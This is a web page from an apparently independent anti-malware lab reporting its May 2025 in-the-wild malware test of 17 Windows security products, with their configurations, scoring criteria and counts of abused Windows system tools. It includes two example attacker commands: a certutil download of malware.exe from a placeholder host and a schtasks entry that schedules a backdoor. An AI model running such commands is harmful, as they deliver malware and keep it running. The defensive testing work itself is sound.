PL
PL

The May edition of Advanced In-The-Wild Malware Test on Internet samples

18 June 2025

Almost half of the year is behind us, thus we finish the 3rd edition of the Advanced In-The-Wild Malware Test – a long-term study aimed at identifying the best comprehensive security solutions for protecting Windows systems. In May, we tested as many as 17 solutions for detecting and neutralizing threats – we obtain URLs leading to malicious content from various places. These include commercial and free feeds, instant messaging, Internet forums, honeypots.

Our tests comply with the guidelines of the Anti-Malware Testing Standards Organization. Details about the test are available at this website as well as in our methodology.

What solutions did we test in May 2025?

What settings do we use?

Although we try to avoid PUP and PUA (potentially unwanted application) samples in our tests, we recommend enabling protection against such threats – we also always activate it ourselves.

When setting up security software, we make sure to use a dedicated browser extension, if possible. In addition, we set the program to automatically respond to incidents by blocking, removing or fixing them.

Based on many tests to date, we note that the default settings are usually good, but do not always provide the optimal level of protection. Therefore, for the sake of full transparency, we report on all configuration modifications – both those designed to increase effectiveness and those required by the software developer.

Solutions for Enterprise

Emsisoft logo

Emsisoft Enterprise Security + EDR

Default settings + automatic PUP repair + EDR + Rollback + browser protection

mks vir logo

mks_vir Endpoint Security + EDR

Extended http/https scanning enabled + browser protection + EDR

threatdown logo

ThreatDown Endpoint Protection + EDR

Default settings + browser protection + EDR

watchguard logo

WatchGuard Endpoint Security

Default settings + browser protection

XCITIUM logo

Xcitium ZeroThreat Advanced + EDR

Preset policy “Windows – Secure Profile v.8.1” + HIPS default action on “Block requests” + EDR enabled

Solutions for Consumers and Small Business

avast logo

Avast Free Antivirus

Default settings + automatic PUP repair + browser protection

Bitdefender logo

Bitdefender Total Protection

Default settings + browser protection

Comodo-logo.svg

Comodo Internet Security 2025

Browser protection + automatic blocking for sandbox

ESET logo

Eset Smart Security

Default settings + browser protection

f secure logo

F-Secure Total

Default settings + browser protection

g data total security

G Data Internet Security

Default settings + browser protection

Malwarebytes logo

Malwarebytes Premium

Default settings + browser protection

mcafee logo

McAfee Total Protection

Default settings + browser protection

microsoft defender logo

Microsoft Defender

Default settings (does not integrate with Firefox)

NortonLifeLock logo

Norton Antivirus Plus

Default settings + browser protection

webroot antivirus

Webroot Antivirus

Default settings + browser protection

zonealarm logo

ZoneAlarm Extreme Security NextGen

Default settings + browser protection + Anti-Keylogger enabled

Advanced In-The-Wild Malware Test

How do we evaluate and how long does it last?

We conduct 6 editions of surveys per calendar year, which culminate in a grand summary to determine the awards for the best antivirus solutions.

In each edition, we evaluate the effectiveness of the tested security products for companies and for consumers considering 3 key parameters:

  1. PRE_EXECUTION – we assess whether the threat has been identified and blocked at an early stage, before it has even run. This may include blocking a website, a downloaded file, or an attempt to write or access it.

  2. POST_EXECUTION – we check whether the malware that has been downloaded and run on the system has been recognized and stopped during a more advanced analysis. This stage simulates the most dangerous scenario – a 0-day attack, in which the malware has already managed to start running.

  3. REMEDIATION TIME – we measure the time that elapses from the moment a threat appears on the system to its complete removal and remediation of the incident. This parameter is closely related to the previous ones and allows us to assess how quickly and effectively the software handles the elimination of threats.

Malware often uses native Windows tools and components (so-called LOLBins – Living off the Land Binaries) to perform unauthorized operations without raising suspicion. Based on the analyzed logs, the following number of cases were identified where legitimate system processes were involved in malware activities:

  1. schtasks.exe, 4974
  2. rundll32.exe, 3531
  3. certutil.exe, 2154
  4. powershell.exe, 1271
  5. consent.exe, 881
  6. csc.exe, 455
  7. wmiprvse.exe, 302
  8. ping.exe, 263
  9. reg.exe, 181
  10. mshta.exe, 145
  11. wscript.exe, 127
  12. wmic.exe, 122
  13. regsvr32.exe, 70
  14. control.exe, 42
  15. conhost.exe, 31
  16. net1.exe, 28
  17. vssadmin.exe, 26
  18. iexplore.exe, 8
  19. cscript.exe, 4

certutil.exe process – 2154 occurrences, for example:

				
					certutil -urlcache -split -f http://example.com/malware.exe malware.exe

schtasks.exe process – 4974 occurrences in the tested systems, for example:

				
					schtasks /create /tn "Updater" /tr "C:\backdoor.exe" /sc minute /mo 5 /f
avlab results in May 2025

Some security solutions failed to detect at least one threat sample. While a single incident may seem statistically insignificant, it may actually represent a previously unknown 0-day threat. This type of attack is capable of bypassing the protection mechanisms of the operating system and the detection engines of installed antivirus software. As a result, it can result in system infection, data encryption, information theft or other unwanted activity.

About the Advanced In-The-Wild Malware Test series

The test is conducted periodically six times a year and focuses on evaluating the effectiveness of security solutions in detecting and blocking malware running in a Windows 11 environment.

The purpose of the test is to identify the strengths and weaknesses of the tested solutions in detecting and neutralizing actively occurring threats in the environment. The test is also accompanied by the collection of telemetry data to analyze the current threat landscape and the techniques most commonly used by cybercriminals in targeted and mass attacks.

 

About AVLab Cybersecurity Foundation

AVLab Cybersecurity Foundation is a respected organization working within AMTSO (Anti-Malware Testing Standards Organization) and Microsoft Virus Initiative (MVI). It specializes in enhancing digital security through detailed testing and analysis of security solutions. AVLab’s experts use advanced and realistic methods to evaluate the effectiveness of security software under real-world threat conditions. The organization regularly updates its testing protocols to deliver reliable and valuable cybersecurity reports, supporting both individual users and businesses in making informed decisions to protect their systems

Advanced In-The-Wild Malware Test

recent results
More about this service
AVLab Advanced In the malware test COMP
guest
0 Comments
Inline Feedbacks
View all comments

Latest Publications

Newsletter

SIGN UP

Newsletter

SIGN UP FOR EMAIL NOTIFICATIONS FOR ENGLISH CONTENT ONLY!
SIGN UP

Our Tests

Advanced In-The-Wild
Malware Test

Test of modules
to protect online banking

Attack Visibility
in EDR-XDR Telemetry

Cyber Transparency
Audit

The contents of the website is legally protected © 2025 | AVLab Cybersecurity Foundation | Privacy policy

Menu

Tests

AWARDS
\r\n <\/div>\r\n<\/div>\r\n","isUserRated":"0","version":"7.6.33","wc_post_id":"13716","isCookiesEnabled":"1","loadLastCommentId":"0","dataFilterCallbacks":[],"phraseFilters":[],"scrollSize":"32","url":"https:\/\/avlab.pl\/en\/wp-admin\/admin-ajax.php","customAjaxUrl":"https:\/\/avlab.pl\/en\/wp-content\/plugins\/wpdiscuz\/utils\/ajax\/wpdiscuz-ajax.php","bubbleUpdateUrl":"https:\/\/avlab.pl\/en\/wp-json\/wpdiscuz\/v1\/update","restNonce":"28a94ac415","is_rate_editable":"0","menu_icon":"https:\/\/avlab.pl\/en\/wp-content\/plugins\/wpdiscuz\/assets\/img\/plugin-icon\/wpdiscuz-svg.svg","menu_icon_hover":"https:\/\/avlab.pl\/en\/wp-content\/plugins\/wpdiscuz\/assets\/img\/plugin-icon\/wpdiscuz-svg_hover.svg","is_email_field_required":"1"}; var wpdiscuzUCObj = {"msgConfirmDeleteComment":"Are you sure you want to delete this comment?","msgConfirmCancelSubscription":"Are you sure you want to cancel this subscription?","msgConfirmCancelFollow":"Are you sure you want to cancel this follow?","additionalTab":"0"}; -->